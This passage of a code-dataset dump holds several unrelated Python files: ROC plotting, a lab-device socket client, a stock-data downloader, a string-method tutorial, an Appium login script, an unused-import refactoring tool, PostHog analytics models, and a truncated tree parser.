roc_auc_conf)\n plt.plot(fpr_lsa, tpr_lsa, 'c', label = 'AUC_lsa = %0.2f' % roc_auc_lsa)\n plt.plot(fpr_dsa, tpr_dsa, 'g', label = 'AUC_dsa = %0.2f' % roc_auc_dsa)\n plt.legend(loc = 'lower right')\n plt.plot([0, 1], [0, 1],'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig('roc_curve_%s.jpg' % (args.d))\n\n\n # # calculate AUC\n # auc = roc_auc_score(true_score, y_score)\n # print('AUC score of %s dataset' % (args.d))\n \n # fpr = dict()\n # tpr = dict()\n # roc_auc = dict()\n # for i in range(num_class):\n # fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n # roc_auc[i] = auc(fpr[i], tpr[i])\n\n # # Compute micro-average ROC curve and ROC area\n # fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n # roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n \n # plt.figure()\n # lw = 2\n # plt.plot(fpr[2], tpr[2], color='darkorange',\n # lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n # plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n # plt.xlim([0.0, 1.0])\n # plt.ylim([0.0, 1.05])\n # plt.xlabel('False Positive Rate')\n # plt.ylabel('True Positive Rate')\n # plt.title('Receiver operating characteristic of confidence score')\n # plt.legend(loc=\"lower right\")\n # plt.savefig('roc_curve_%s.jpg' % (args.d)) \n # plt.close()\n\n \n\n ","sub_path":"roc_curve.py","file_name":"roc_curve.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"4956205","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor: YJ\nEmail: yj1516268@outlook.com\nCreated Date: 2018-11-07 14:22:51\n\n\n\"\"\"\n\nimport 
toml\nimport time\nimport struct\nimport socket\n\n\nconf = toml.load(\"./resource/conf/conf.toml\")\n\nhost = '192.168.1.2'\nport = 7777\n\ncmds = conf['command'].get('Command', None)\nnames = conf['command'].get('Name', None)\nindex = conf['command'].get('Chamber-ID', '1')\nparams = conf['command'].get('Param', None)\n\n# CONTROL VALUES & MEASURING VALUES\ncmd_ctrl = cmds[0:6]\ncmd_mse = cmds[6:]\nname_ctrl = names[0:6]\nname_mse = names[6:]\nparam_ctrl = params[0:6]\nparam_mse = params[0:14]\n\ncommands = []\norder_keys = {}\n\n# commands -- CONTROL VALUES\nfor cmd in cmd_ctrl:\n for param in param_ctrl:\n command = {\"cmd\": \"{}\".format(cmd), \"chamber_index\": index, \"param\": param, }\n commands.append(command)\n\n# commands -- MEASURING VALUES\nfor cmd in cmd_mse:\n for param in param_mse:\n command = {\"cmd\": \"{}\".format(cmd), \"chamber_index\": index, \"param\": param, }\n commands.append(command)\n\n# order_keys -- CONTROL VALUES\nfor k, v in enumerate(name_ctrl):\n for param in param_ctrl:\n key = (\"{}\".format(cmd_ctrl[k]), param)\n value = name_ctrl[k]\n order_keys.update({key: value})\n\n# order_keys -- MEASURING VALUES\nfor k, v in enumerate(name_mse):\n for param in param_mse:\n key = (\"{}\".format(cmd_mse[k]), param)\n value = name_mse[k]\n order_keys.update({key: value})\n\n\ndef pack_data(command):\n \"\"\"\n convert request to bytes\n \"\"\"\n SR = 182 # separator\n CR = 13 # terminator\n\n cmd = command['cmd']\n chamber_index = command['chamber_index']\n params = command['param']\n\n fmt_header = \"{0}s1B{1}s1B\".format(len(cmd), len(chamber_index))\n fmt_body = \"\"\n for param in params:\n fmt_body = fmt_body + \"{0}s1B\".format(len(param))\n fmt_tail = \"1B\"\n fmt = fmt_header + fmt_body + fmt_tail\n\n params = [param.encode() for param in params]\n\n # insert SR to params, e.g. [param1, SR, param2, SR ...]\n for i in range(len(params)):\n params.insert(2*i+1, SR)\n\n bytes_data = struct.pack(\n fmt, cmd.encode(), SR, chamber_index.encode(), SR, *params, CR\n )\n\n return bytes_data\n\n\ndef sendrecv(s, command):\n s.sendall(command)\n bytes_data = s.recv(8192)\n return bytes_data\n\n\ndef decode_data(bytes_data):\n contents = bytes_data.split(b'\\r')[0]\n error_flag = b'-'\n if contents.startswith(error_flag):\n return None\n else:\n data = contents.split(b'\\xb6')[1].decode()\n return data\n\nif __name__ == '__main__':\n for num, command in enumerate(commands):\n command = pack_data(command)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('192.168.1.2', 7777))\n bytes_data = sendrecv(s, command)\n data = decode_data(bytes_data)\n print(\"{}: {}\".format(num+1, data))\n","sub_path":"client_syncio.py","file_name":"client_syncio.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"513323448","text":"import math\nimport os\nimport shutil\nimport time\nimport urllib.request\n\n\n# period1 and period2 are Unix time stamps for your start and end date\n# interval is the data retrieval interval (this can be either 1d, 1w or 1m)\n\n\ndef pull_all_data():\n with open(\"data/Lists/sp5002012.txt\", \"r\") as file:\n for line in file:\n company = line.strip()\n print(company)\n print(\"\\n\")\n pull_historical_data(company)\n try:\n filename = make_filename(company)\n src = os.getcwd()\n dst = src + \"/data\"\n shutil.move(os.path.join(src, filename), os.path.join(dst, filename))\n except:\n print(\"Error moving file\")\n\n\ndef 
pull_specific_stocks(stocks):\n \"\"\"Download data of specific stocks from yahoo finance\"\"\"\n for stock in stocks:\n\n print(\"Downloading historical data for: \" + stock)\n pull_historical_data(stock)\n\n try:\n filename = make_filename((stock))\n src = os.getcwd()\n dst = src + \"/data\"\n shutil.move(os.path.join(src, filename), os.path.join(dst, filename))\n except Exception as e:\n print(\"Error moving file\")\n print(e)\n\n\ncurrent_time = str(math.floor(time.time()))\n\n\n# Times:\n# 2019-01-01 : 1546300800\n# 2000-01-01 : 946684800\n\n\ndef make_url(\n ticker_symbol, period1=\"946684800\", period2=current_time, interval=\"1d\",\n):\n return \"https://query1.finance.yahoo.com/v7/finance/download/{}?period1={}&period2={}&interval={}&events=history\".format(\n ticker_symbol, period1, period2, interval\n )\n\n\ndef make_filename(ticker_symbol):\n return ticker_symbol + \".csv\"\n\n\ndef pull_historical_data(ticker_symbol):\n try:\n urllib.request.urlretrieve(\n make_url(ticker_symbol), make_filename(ticker_symbol)\n )\n # except urllib.request.ContentTooShortError as e:\n # outfile = open(make_filename(ticker_symbol, directory), \"w\")\n # outfile.write(e.content)\n # outfile.close()\n except:\n print(\"Error Fetching stock, may not exist\")\n\n\nif __name__ == \"__main__\":\n # pull_all_data()\n stocks = ['GOOG', 'AAPL', 'GLD', 'ZM', 'COST', 'UAL']\n pull_specific_stocks(stocks)\n","sub_path":"historical_data.py","file_name":"historical_data.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"630029358","text":"\"\"\"\nCheck whether the head or tail of a string meets the requirements\n\nUse case 1: URL protocol check (prefix check)\nUse case 2: file type check (suffix check, i.e. file extension check)\n\"\"\"\n\nfilename = 'spam.txt'\nprint(filename.endswith('.txt'))\n# The following statements achieve the same effect, but are not recommended in this example (less elegant)\nprint(filename[-4:] == '.txt')\n#import re\n#print(re.match('.txt', filename))\n\nurl = 'http://www.python.org'\nprint(url.startswith('http'))\n\nimport os\nfilename = os.listdir('.')\n# To check multiple patterns at once, you need to pass a tuple as the argument\n# If you want to pass a list or a set, be sure to convert it to a tuple with tuple() first\n# Note: type() is a kind of forced type conversion; it is normally not recommended and only used in some special cases\nprint([name for name in filename if name.endswith(('.gitignore', '.md'))])\n\n# any() takes an iterable\nprint(any(name.endswith('.h') for name in filename))\n\n# Example: decide how to open a file based on the protocol type\nfrom urllib.request import urlopen\n\ndef read_data(urlname_or_filename):\n if urlname_or_filename.startswith(('http:', 'https:', 'ftp:')):\n return urlopen(urlname_or_filename).read()\n else:\n with open(urlname_or_filename) as f:\n return f.read()\n","sub_path":"string_2/str_2_2_startswith_endswith.py","file_name":"str_2_2_startswith_endswith.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"632434503","text":"from appium import webdriver\n\ncaps = {\n \"platformName\": \"Android\",\n \"platformVersion\": \"5.1.1\",\n \"deviceName\": \"127.0.0.1:62001\",\n \"appPackage\": \"com.lqr.wechat\",\n \"appActivity\": \"com.lqr.wechat.ui.activity.SplashActivity\",\n \"noReset\": True\n # \"unicodeKeyboard\": True,\n # \"resetKeyboard\": True,\n # \"automationName\": \"uiautomator2\",\n}\n\ndriver = webdriver.Remote(\"http://127.0.0.1:4723/wd/hub\", caps)\n\nresults = driver.find_elements_by_id(\"com.lqr.wechat:id/btnLogin\")\n\nif results:\n print(\"Login button exists, not logged in\")\n results[0].click()\n driver.find_element_by_id(\"com.lqr.wechat:id/etPhone\").send_keys(\"18010181267\")\n driver.find_element_by_id(\"com.lqr.wechat:id/etPwd\").send_keys(\"123456\")\n 
login_btn = driver.find_element_by_id(\"com.lqr.wechat:id/btnLogin\")\n if login_btn.get_attribute(\"enabled\"):\n print(\"enabled\")\n login_btn.click()\n else:\n print(\"disabled\")\nelse:\n print(\"No login button, already logged in\")\n\n# Find the Contacts tab and print its attributes\ncontacts = driver.find_element_by_id(\"com.lqr.wechat:id/tvContactsTextPress\")\nprint(contacts.get_attribute('resourceId'))\nprint(contacts.get_attribute('className'))\nprint(contacts.get_attribute('displayed'))\n\ndriver.quit()\n","sub_path":"practice/myLove/appium/Day02/wechat_if_login.py","file_name":"wechat_if_login.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"557042464","text":"from contextlib import contextmanager\nfrom lib2to3.fixer_base import BaseFix\nfrom lib2to3.fixer_util import (\n BlankLine, FromImport, Leaf, Newline, syms, token)\nfrom lib2to3.refactor import RefactoringTool\n\n\ndef traverse_imports(names):\n \"\"\"\n Walks over all the names imported in a dotted_as_names node.\n \"\"\"\n pending = [names]\n while pending:\n node = pending.pop()\n if node.type in {token.NAME, token.STAR}:\n yield node.value\n elif node.type == syms.dotted_name:\n yield \"\".join([ch.value for ch in node.children])\n elif node.type in {syms.dotted_as_name, syms.import_as_name}:\n yield node.children[2].value\n elif node.type in {syms.dotted_as_names, syms.import_as_names}:\n pending.extend(node.children[::-2])\n else:\n raise ValueError(\"unknown node type\", node.type)\n\n\nclass RefactorImports(BaseFix):\n\n PATTERN = r\"\"\"\n simple_stmt<\n (\n import_name< 'import' imp=any >\n |\n import_from< 'from' imp=(['.'*] any) 'import' ['('] items=any [')'] >\n ) '\\n'\n >\n \"\"\"\n\n def __init__(self):\n self.unused_modules = []\n super().__init__(None, None) # options and logger\n\n @contextmanager\n def clean(self, unused_modules):\n try:\n self.unused_modules.clear()\n self.unused_modules.extend(unused_modules)\n yield\n finally:\n self.unused_modules.clear()\n\n def transform(self, node, results):\n imp = self.get_imp_if_equal_to_lineno(node.get_lineno())\n if imp:\n if node.children[0].type == syms.import_from:\n return self.import_from(node, results, imp)\n elif node.children[0].type == syms.import_name:\n return self.import_name(node, results)\n\n def import_from(self, node, results, imp):\n if imp[\"star\"]:\n if not imp[\"modules\"]:\n return BlankLine()\n else:\n package_name = imp[\"module\"].__name__\n name_leafs = [\n Leaf(\n token.NAME,\n \", \".join(sorted(imp[\"modules\"])),\n prefix=\" \",\n ),\n Newline(),\n ]\n return FromImport(package_name, name_leafs)\n return self.transform_inner_children(node, results[\"items\"])\n\n def import_name(self, node, results):\n return self.transform_inner_children(node, results[\"imp\"])\n\n def get_imp_if_equal_to_lineno(self, lineno):\n for imp in self.unused_modules:\n if imp[\"lineno\"] == lineno:\n return imp\n\n def transform_inner_children(self, node, imports):\n if imports.type == syms.import_as_name or not imports.children:\n children = [imports]\n else:\n children = imports.children\n trailing_comma = None\n if children[-1].type == token.COMMA:\n # if end of children's char is equal to ',' then remove it\n trailing_comma = children.pop()\n commas = children[1:-1:2]\n module_nodes = children[::2]\n modules = tuple(traverse_imports(imports))\n remove_counter = 0\n for index, module in enumerate(modules):\n if self.is_module_unused(module, node):\n if commas:\n if index + 1 == len(modules):\n comma = 
commas.pop(index - remove_counter - 1)\n if trailing_comma:\n trailing_comma.remove()\n trailing_comma = None\n else:\n comma = commas.pop(index - remove_counter)\n comma.remove()\n module_nodes.pop(index - remove_counter).remove()\n remove_counter += 1\n if remove_counter == len(modules):\n return BlankLine()\n if trailing_comma:\n children.append(trailing_comma)\n\n def is_module_unused(self, import_name, node):\n for imp in self.unused_modules:\n if (\n imp[\"name\"] == import_name\n and imp[\"lineno\"] == node.get_lineno()\n ):\n return imp\n\n\nclass RefactorTool(RefactoringTool):\n def __init__(self):\n self._fixer = RefactorImports()\n self._fixers = [self._fixer]\n super().__init__(None, options={\"print_function\": True})\n\n def get_fixers(self):\n return self._fixers, []\n\n def refactor_string(self, data, unused_imports, name=\"unimport\"):\n with self._fixer.clean(unused_imports):\n source = super().refactor_string(data, name)\n return str(source)\n","sub_path":"unimport/refactor.py","file_name":"refactor.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"152938684","text":"from django.db import models\nfrom django.contrib.postgres.fields import JSONField, ArrayField\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractUser, BaseUserManager\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.dispatch import receiver\nfrom django.forms.models import model_to_dict\nfrom django.utils import timezone\nfrom typing import List, Tuple, Optional, Any, Union, Dict\nfrom django.db import transaction\nfrom sentry_sdk import capture_exception\n\nimport secrets\nimport re\n\ndef split_selector_into_parts(selector: str) -> List:\n tags = selector.split(' > ')\n tags.reverse()\n ret: List[Dict[str, Union[str, List]]] = []\n for tag in tags:\n data: Dict[str, Union[str, List]] = {}\n if 'id=' in tag:\n id_regex = r\"\\[id=\\'(.*)']\"\n result = re.match(id_regex, tag)\n return [{'attr_id': result[1]}] # type: ignore\n if 'nth-child(' in tag:\n parts = tag.split(':nth-child(')\n data['nth_child'] = parts[1].replace(')', '')\n tag = parts[0]\n if '.' 
in tag:\n parts = tag.split('.')\n data['attr_class'] = parts[1:]\n tag = parts[0]\n data['tag_name'] = tag\n ret.append(data)\n return ret\n\nclass UserManager(BaseUserManager):\n \"\"\"Define a model manager for User model with no username field.\"\"\"\n\n use_in_migrations = True\n\n def _create_user(self, email, password, **extra_fields):\n \"\"\"Create and save a User with the given email and password.\"\"\"\n if not email:\n raise ValueError('The given email must be set')\n email = self.normalize_email(email)\n if hasattr(settings, 'RESTRICT_SIGNUPS') and settings.RESTRICT_SIGNUPS and email.rsplit('@', 1)[1] not in settings.RESTRICT_SIGNUPS.split(','):\n raise ValueError(\"Can't sign up with this email\")\n user = self.model(email=email, **extra_fields)\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_user(self, email, password=None, **extra_fields):\n \"\"\"Create and save a regular User with the given email and password.\"\"\"\n extra_fields.setdefault('is_staff', False)\n extra_fields.setdefault('is_superuser', False)\n if not settings.TEST:\n extra_fields.setdefault('distinct_id', secrets.token_urlsafe(32))\n return self._create_user(email, password, **extra_fields)\n\n def create_superuser(self, email, password, **extra_fields):\n \"\"\"Create and save a SuperUser with the given email and password.\"\"\"\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n return self._create_user(email, password, **extra_fields)\n\nclass User(AbstractUser):\n username = None # type: ignore\n email = models.EmailField(_('email address'), unique=True)\n temporary_token: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n distinct_id: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS: List[str] = []\n\n objects = UserManager() # type: ignore\n\n\nclass Team(models.Model):\n users: models.ManyToManyField = models.ManyToManyField(User, blank=True)\n api_token: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n app_url: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n name: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n opt_out_capture: models.BooleanField = models.BooleanField(default=False)\n\n def __str__(self):\n if self.name:\n return self.name\n if self.app_url:\n return self.app_url\n return str(self.pk)\n\n@receiver(models.signals.post_save, sender=Team)\ndef create_team_signup_token(sender, instance, created, **kwargs):\n # Don't do this when running tests to speed up\n if created and not settings.TEST:\n if not instance.api_token:\n instance.api_token = secrets.token_urlsafe(32)\n instance.save()\n\nclass EventManager(models.Manager):\n def _handle_nth_child(self, index, item, where, params):\n where.append(\"AND E{}.nth_child = %s\".format(index))\n params.append(item)\n\n def _handle_tag_name(self, index, item, where, params):\n where.append(\"AND E{}.tag_name = %s\".format(index))\n params.append(item)\n\n def _handle_id(self, index, item, where, params):\n where.append(\"AND E{}.attr_id = %s\".format(index))\n params.append(item)\n\n def _handle_class(self, index, item, where, params):\n where.append(\"AND 
E{}.attr_class @> %s::varchar(200)[]\".format(index))\n params.append(item)\n\n def _filter_selector(self, filters, joins, where, params):\n selector = filters.pop('selector')\n parts = split_selector_into_parts(selector)\n for index, tag in enumerate(parts):\n if tag.get('nth_child'):\n self._handle_nth_child(index, tag['nth_child'], where=where, params=params)\n if tag.get('attr_id'):\n self._handle_id(index, tag['attr_id'], where=where, params=params)\n if tag.get('attr_class'):\n self._handle_class(index, tag['attr_class'], where=where, params=params)\n if tag.get('tag_name'):\n self._handle_tag_name(index, tag['tag_name'], where=where, params=params)\n if index > 0:\n joins.append('INNER JOIN posthog_element E{0} ON (posthog_event.id = E{0}.event_id)'.format(index))\n where.append('AND E{0}.order = (( E{1}.order + 1))'.format(index, index-1))\n\n def _filters(self, filters, where: List, params: List):\n for key, value in filters.items():\n if key == 'url' and value:\n where.append('AND posthog_event.properties ->> \\'$current_url\\' LIKE %s')\n params.append('%{}%'.format(value))\n elif key == 'event' and value:\n where.append('AND posthog_event.event = %s')\n params.append(value)\n elif key not in ['action', 'id', 'selector'] and value:\n where.append('AND E0.{} = %s'.format(key))\n params.append(value)\n\n def _step(self, step, joins: List, where: List, params: List):\n filters = model_to_dict(step)\n where.append(' OR (1=1 ')\n if filters['selector']:\n filter_selector = self._filter_selector(filters, joins=joins, where=where, params=params)\n self._filters(filters, where=where, params=params)\n where.append(')')\n\n def _select(self, count=None, group_by=None, group_by_table=None, count_by=None):\n if count_by:\n return \"SELECT date_trunc('{0}', posthog_event.timestamp) as {0}, COUNT(1) as id FROM posthog_event \".format(count_by)\n if group_by:\n return \"SELECT DISTINCT ON (posthog_persondistinctid.person_id) {}.{} as id, posthog_event.id as event_id FROM posthog_event \".format(group_by_table, group_by)\n if count:\n return \"SELECT COUNT(posthog_event.id) as id FROM posthog_event \"\n return \"\"\"\n SELECT \"posthog_event\".\"id\", \n \"posthog_event\".\"team_id\", \n \"posthog_event\".\"event\", \n \"posthog_event\".\"distinct_id\", \n \"posthog_event\".\"properties\",\n \"posthog_event\".\"elements\", \n \"posthog_event\".\"timestamp\", \n \"posthog_event\".\"ip\",\n \"posthog_persondistinctid\".\"person_id\" as person_id\n FROM \"posthog_event\" \"\"\"\n\n def filter_by_action(self, action, count: Optional[bool]=None, group_by: Optional[str]=None, count_by: Optional[str]=None, group_by_table: Optional[str]=None, limit: Optional[int]=None, where: Optional[Union[str, List[Any]]]=None) -> models.query.RawQuerySet:\n query = self._select(count=count, group_by=group_by, group_by_table=group_by_table, count_by=count_by)\n\n joins: List[str] = [\n 'INNER JOIN posthog_persondistinctid ON (posthog_event.distinct_id = posthog_persondistinctid.distinct_id AND posthog_persondistinctid.team_id = {}) '.format(action.team_id),\n 'LEFT OUTER JOIN posthog_element E0 ON (posthog_event.id = E0.event_id)'\n ]\n where_list: List[str] = []\n params: List[str] = []\n\n for step in action.steps.all():\n self._step(step, joins=joins, where=where_list, params=params)\n\n query += ' '.join(joins)\n query += ' WHERE '\n query += ' posthog_event.team_id = {}'.format(action.team_id)\n query += ' AND (1=2 '\n query += ' '.join(where_list)\n query += ') '\n if where:\n if isinstance(where, list):\n for 
w in where:\n query += ' AND {}'.format(w[0])\n params.extend(w[1])\n elif where != '':\n query += ' AND ({})'.format(where)\n\n if group_by:\n query += ' GROUP BY {}.{}, posthog_event.id'.format(group_by_table, group_by)\n if count_by:\n query += ' GROUP BY day'\n if not count and not group_by and not count_by:\n query += ' ORDER BY posthog_event.timestamp DESC'\n if limit:\n query += ' LIMIT %s' % limit\n events = Event.objects.raw(query, params)\n if count:\n return events[0].id # bit of a hack to get the total count here\n return events\n\n\nclass Event(models.Model):\n @property\n def person(self):\n return Person.objects.get(team_id=self.team_id, persondistinctid__distinct_id=self.distinct_id)\n\n def _element_matches_selector(self, elements, selector: Dict, order=None):\n for element in elements:\n if order != None and order != element.order:\n continue\n if selector.get('tag_name') and selector['tag_name'] != element.tag_name:\n continue\n if selector.get('attr_class') and (not element.attr_class or not all(name in element.attr_class for name in selector['attr_class'])):\n continue\n if selector.get('nth_child') and selector['nth_child'] != element.nth_child:\n continue\n if selector.get('attr_id') and selector['attr_id'] != element.attr_id:\n continue\n return element\n return False\n\n def _event_matches_selector(self, event, selector: str) -> bool:\n elements = event.element_set.all()\n prev = None\n parts = split_selector_into_parts(selector)\n for tag in parts:\n prev = self._element_matches_selector(\n elements=elements,\n order=prev.order + 1 if prev else None, # type: ignore\n selector=tag)\n if not prev:\n return False\n return True\n\n def _element_matches_step(self, filters: Dict, element) -> bool:\n match = True\n for key, value in filters.items():\n if getattr(element, key) != value:\n match = False\n return match\n\n def _event_matches_step(self, event, step) -> bool:\n filters = model_to_dict(step)\n filters.pop('action')\n filters.pop('id')\n filters = {key: value for key, value in filters.items() if value}\n\n if filters.get('url'):\n if event.properties.get('$current_url') != filters['url']:\n return False\n filters.pop('url')\n if filters.get('event'):\n if event.event != filters['event']:\n return False\n filters.pop('event')\n if len(filters.keys()) == 0 and event.element_set.count() == 0:\n # if no more filters to apply, and no elements, means it was a pageview/event filter so can return\n return True\n if filters.get('selector'):\n if not self._event_matches_selector(event, filters['selector']):\n return False\n filters.pop('selector')\n for element in event.element_set.all():\n if self._element_matches_step(filters, element):\n return True\n return False\n\n @property\n def actions(self) -> List:\n action_steps = ActionStep.objects.filter(action__team_id=self.team_id).select_related('action')\n actions: List[Dict] = []\n for step in action_steps:\n if step.action not in actions:\n if self._event_matches_step(self, step):\n actions.append(step.action)\n return actions\n\n objects = EventManager()\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n event: models.CharField = models.CharField(max_length=200, null=True, blank=True)\n distinct_id: models.CharField = models.CharField(max_length=200)\n properties: JSONField = JSONField(default=dict)\n elements: JSONField = JSONField(default=list, null=True, blank=True)\n timestamp: models.DateTimeField = models.DateTimeField(default=timezone.now, blank=True)\n ip: 
models.GenericIPAddressField = models.GenericIPAddressField(null=True, blank=True)\n\nclass PersonManager(models.Manager):\n def create(self, *args: Any, **kwargs: Any):\n with transaction.atomic():\n if not kwargs.get('distinct_ids'):\n return super().create(*args, **kwargs)\n distinct_ids = kwargs.pop('distinct_ids')\n person = super().create(*args, **kwargs)\n person.add_distinct_ids(distinct_ids)\n return person\n\nclass Person(models.Model):\n @property\n def distinct_ids(self) -> List[str]:\n if hasattr(self, 'distinct_ids_cache'):\n return [id.distinct_id for id in self.distinct_ids_cache] # type: ignore\n return [id[0] for id in PersonDistinctId.objects.filter(person=self).order_by('id').values_list('distinct_id')]\n\n def add_distinct_id(self, distinct_id: str) -> None:\n PersonDistinctId.objects.create(person=self, distinct_id=distinct_id, team=self.team)\n\n def add_distinct_ids(self, distinct_ids: List[str]) -> None:\n for distinct_id in distinct_ids:\n self.add_distinct_id(distinct_id)\n\n objects = PersonManager()\n created_at: models.DateTimeField = models.DateTimeField(auto_now_add=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n properties: JSONField = JSONField(default=dict)\n is_user: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n\nclass PersonDistinctId(models.Model):\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=['team', 'distinct_id'], name='unique distinct_id for team')\n ]\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n person: models.ForeignKey = models.ForeignKey(Person, on_delete=models.CASCADE)\n distinct_id: models.CharField = models.CharField(max_length=400)\n\nclass Element(models.Model):\n USEFUL_ELEMENTS = ['a', 'button', 'input', 'select', 'textarea', 'label']\n text: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n tag_name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n href: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n attr_id: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n attr_class = ArrayField(models.CharField(max_length=200, blank=True), null=True, blank=True)\n nth_child: models.IntegerField = models.IntegerField(null=True, blank=True)\n nth_of_type: models.IntegerField = models.IntegerField(null=True, blank=True)\n attributes: JSONField = JSONField(default=dict)\n event: models.ForeignKey = models.ForeignKey(Event, on_delete=models.CASCADE)\n order: models.IntegerField = models.IntegerField(null=True, blank=True)\n\nclass Action(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n created_at: models.DateTimeField = models.DateTimeField(auto_now_add=True, blank=True)\n created_by: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)\n\n def __str__(self):\n return self.name\n\nclass ActionStep(models.Model):\n action: models.ForeignKey = models.ForeignKey(Action, related_name='steps', on_delete=models.CASCADE)\n tag_name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n text: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n href: models.CharField = models.CharField(max_length=400, null=True, 
blank=True)\n selector: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n url: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n event: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n\nclass Funnel(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n created_by: models.ForeignKey = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)\n\nclass FunnelStep(models.Model):\n funnel: models.ForeignKey = models.ForeignKey(Funnel, related_name='steps', on_delete=models.CASCADE)\n action: models.ForeignKey = models.ForeignKey(Action, on_delete=models.CASCADE)\n order: models.IntegerField = models.IntegerField()\n\nclass DashboardItem(models.Model):\n name: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n team: models.ForeignKey = models.ForeignKey(Team, on_delete=models.CASCADE)\n filters: JSONField = JSONField(default=dict)\n order: models.IntegerField = models.IntegerField(null=True, blank=True)\n type: models.CharField = models.CharField(max_length=400, null=True, blank=True)\n deleted: models.BooleanField = models.BooleanField(default=False)","sub_path":"posthog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":18549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"400948652","text":"\nclass tree_node:\n def __init__(self,orientation,percent,childOne=None,childTwo=None):\n self.orientation = orientation\n self.percent = percent\n self.childOne = childOne\n self.childTwo = childTwo\n\ndef traverse(node,startx,starty,length,height):\n results = []\n if not node.childOne and not node.childTwo:\n results.append( (startx,starty,startx+length,starty+height) )\n else:\n if node.orientation == 1:\n top_startx = startx\n top_starty = starty\n top_length = length\n top_height = height*node.percent\n bottom_startx = top_startx\n bottom_starty = top_starty + top_height\n bottom_length = length\n bottom_height = height - top_height\n if node.childOne:\n results.extend(traverse(node.childOne,top_startx,top_starty,top_length,top_height))\n if node.childTwo:\n results.extend(traverse(node.childTwo,bottom_startx,bottom_starty,bottom_length,bottom_height))\n elif node.orientation == 2:\n left_startx = startx\n left_starty = starty\n left_length = length*node.percent\n left_height = height\n right_startx = startx + left_length\n right_starty = starty\n right_length = length - left_length\n right_height = height\n if node.childOne:\n results.extend(traverse(node.childOne,left_startx,left_starty,left_length,left_height))\n if node.childTwo:\n results.extend(traverse(node.childTwo,right_startx,right_starty,right_length,right_height))\n\n return results\n\n\ndef parseTree(ind, plotSizeX, plotSizeY):\n\n plan = []\n tree = ind.genome\n plan.append(tree[0])\n tree = tree[1:]\n \n curpos = []\n termconditions = []\n global termCond \n global currInLine\n global currLine\n global currLoc\n\n termCond = []\n currInLine = []\n\n def reclosefunc():\n\n global currInLine\n global currLine\n global currLoc\n global termCond\n\n currInLine[currLine][currLoc] = 2\n if currInLine != termCond:\n if currLoc % 2 != 0:\n currLine = currLine - 1\n for i in 
